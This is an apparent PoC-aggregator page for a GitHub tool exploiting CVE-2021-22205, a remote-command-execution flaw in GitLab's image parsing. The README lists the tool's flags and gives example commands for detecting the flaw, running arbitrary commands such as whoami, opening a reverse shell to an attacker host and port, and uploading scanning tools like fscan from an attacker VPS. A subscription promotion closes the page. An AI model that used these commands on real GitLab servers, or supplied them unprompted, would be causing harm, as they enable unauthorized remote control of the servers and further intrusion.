CVE-2021-22205 PoC — GitLab 代码注入漏洞

Source

https://github.com/c0okB/CVE-2021-22205

Associated Vulnerability

Title:GitLab 代码注入漏洞 (CVE-2021-22205)
Description:An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.

Description

CVE-2021-22205 RCE

Readme

# CVE-2021-22205
CVE-2021-22205 RCE 工具仅用于分享交流，切勿用于非授权测试，否则与作者无关
```
  -R string
        VPS to load tools eg: -R 127.0.0.1:8083
  -T string
        Tool name eg: -T fscan
  -c string
        exec cmd eg: -c "id" (default "id")
  -host string
        reverse shell host
  -m string
        Method for using of CVE-2021-22205 eg:-m detect|rce1|rev|upload (default "detect")
  -port string
        reverse shell port
  -target string
        Target Url (eg: -target https://10.10.10.10) (default "https://10.10.10.10")
```


实现四个功能

```
DnsLog探测
-m detect
CVE-2021-22205.exe -target https://10.10.10.10 -m detect

RCE
-m rce1 
rce(Postbin-OOB)
CVE-2021-22205.exe -target https://10.10.10.10 -m rce1 -c whoami

反弹shell
-m rev 
CVE-2021-22205.exe -target https://10.10.10.10 -m rev -host 10.10.10.10 -p 8081

上传文件(http出网-curl,需要VPS)
-m upload 
CVE-2021-22205.exe -target https://10.10.10.10 -m upload  -R 127.0.0.1:8083 -T fscan.exe

```

File Snapshot


 [4.0K]  /data/pocs/01e8115a4608b3c443dc5b7d59b067d6a6ce8701
├── [6.6M]  CVE-2021-22205
├── [6.5M]  CVE-2021-22205.exe
├── [  31]  go.mod
├── [7.6K]  main.go
├── [ 224]  output.jpg
├── [1.0K]  README.md
├── [ 796]  shell.jpg
└── [312K]  timeZone.png

0 directories, 8 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!